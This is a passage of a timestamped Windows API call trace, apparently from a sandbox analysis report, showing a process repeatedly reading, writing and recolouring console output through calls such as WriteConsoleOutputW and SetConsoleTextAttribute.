lpWriteRegion=0x1b83d8f0) returned 1 [0312.093] CoTaskMemFree (pv=0x1ad7bc60) [0312.093] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.094] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.094] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.095] GetConsoleOutputCP () returned 0x1b5 [0312.095] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.095] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.096] CoTaskMemFree (pv=0x1ad7bc60) [0312.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.097] GetConsoleOutputCP () returned 0x1b5 [0312.097] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.097] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.098] CoTaskMemFree (pv=0x1ad7bc60) [0312.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.099] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.100] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.100] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.101] GetConsoleOutputCP () returned 0x1b5 [0312.101] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.101] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.102] CoTaskMemFree (pv=0x1ad7bc60) [0312.102] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x2948cc4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x2948cc4*, lpNumberOfCharsWritten=0x1b83da58*=0x14) returned 1 [0312.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.103] GetConsoleOutputCP () returned 0x1b5 [0312.104] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.104] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.104] CoTaskMemFree (pv=0x1ad7bc60) [0312.104] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.105] GetConsoleOutputCP () returned 0x1b5 [0312.106] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.106] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.106] CoTaskMemFree (pv=0x1ad7bc60) [0312.106] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.107] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.107] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.107] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.109] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.109] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.109] GetConsoleOutputCP () returned 0x1b5 [0312.110] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.110] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.110] CoTaskMemFree (pv=0x1ad7bc60) [0312.110] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.111] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.111] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.112] GetConsoleOutputCP () returned 0x1b5 [0312.112] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.112] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.113] CoTaskMemFree (pv=0x1ad7bc60) [0312.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.113] GetConsoleOutputCP () returned 0x1b5 [0312.114] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.114] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.115] CoTaskMemFree (pv=0x1ad7bc60) [0312.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.116] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.117] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.117] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.118] GetConsoleOutputCP () returned 0x1b5 [0312.118] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.118] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.119] CoTaskMemFree (pv=0x1ad7bc60) [0312.119] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x2947c1c*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x2947c1c*, lpNumberOfCharsWritten=0x1b83da58*=0x10) returned 1 [0312.120] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.120] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.120] GetConsoleOutputCP () returned 0x1b5 [0312.121] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.121] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.121] CoTaskMemFree (pv=0x1ad7bc60) [0312.121] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.122] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.122] GetConsoleOutputCP () returned 0x1b5 [0312.122] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.123] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.124] CoTaskMemFree (pv=0x1ad7bc60) [0312.124] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.124] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.125] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.125] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.126] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.126] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.126] GetConsoleOutputCP () returned 0x1b5 [0312.127] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.127] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.127] CoTaskMemFree (pv=0x1ad7bc60) [0312.127] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.129] GetConsoleOutputCP () returned 0x1b5 [0312.129] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.129] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.130] CoTaskMemFree (pv=0x1ad7bc60) [0312.130] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.130] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.130] GetConsoleOutputCP () returned 0x1b5 [0312.131] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.131] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.132] CoTaskMemFree (pv=0x1ad7bc60) [0312.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.133] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.133] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.133] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.134] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.134] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.135] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.135] GetConsoleOutputCP () returned 0x1b5 [0312.135] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.135] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.136] CoTaskMemFree (pv=0x1ad7bc60) [0312.136] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x2947c5c*, nNumberOfCharsToWrite=0x4b, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x2947c5c*, lpNumberOfCharsWritten=0x1b83da58*=0x4b) returned 1 [0312.137] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.137] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.137] GetConsoleOutputCP () returned 0x1b5 [0312.138] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.138] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.138] CoTaskMemFree (pv=0x1ad7bc60) [0312.138] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.139] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.160] GetConsoleOutputCP () returned 0x1b5 [0312.201] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.201] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.224] CoTaskMemFree (pv=0x1ad7bc60) [0312.225] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.225] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.225] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.226] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.226] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.227] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.227] GetConsoleOutputCP () returned 0x1b5 [0312.227] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.228] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.228] CoTaskMemFree (pv=0x1ad7bc60) [0312.228] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.229] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.229] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.230] GetConsoleOutputCP () returned 0x1b5 [0312.230] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.230] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.231] CoTaskMemFree (pv=0x1ad7bc60) [0312.231] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.231] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.231] GetConsoleOutputCP () returned 0x1b5 [0312.232] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.232] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.233] CoTaskMemFree (pv=0x1ad7bc60) [0312.233] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.233] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.234] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.234] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.234] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.235] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.235] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.235] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.236] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.236] GetConsoleOutputCP () returned 0x1b5 [0312.237] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.237] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.237] CoTaskMemFree (pv=0x1ad7bc60) [0312.237] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x2947d0c*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x2947d0c*, lpNumberOfCharsWritten=0x1b83da58*=0x47) returned 1 [0312.238] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.238] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.239] GetConsoleOutputCP () returned 0x1b5 [0312.239] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.239] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.240] CoTaskMemFree (pv=0x1ad7bc60) [0312.240] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.240] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.241] GetConsoleOutputCP () returned 0x1b5 [0312.241] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.241] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.242] CoTaskMemFree (pv=0x1ad7bc60) [0312.242] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.242] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.242] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.244] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.244] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.245] GetConsoleOutputCP () returned 0x1b5 [0312.246] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.246] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.246] CoTaskMemFree (pv=0x1ad7bc60) [0312.246] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.247] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.247] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.248] GetConsoleOutputCP () returned 0x1b5 [0312.249] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.249] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.250] CoTaskMemFree (pv=0x1ad7bc60) [0312.250] 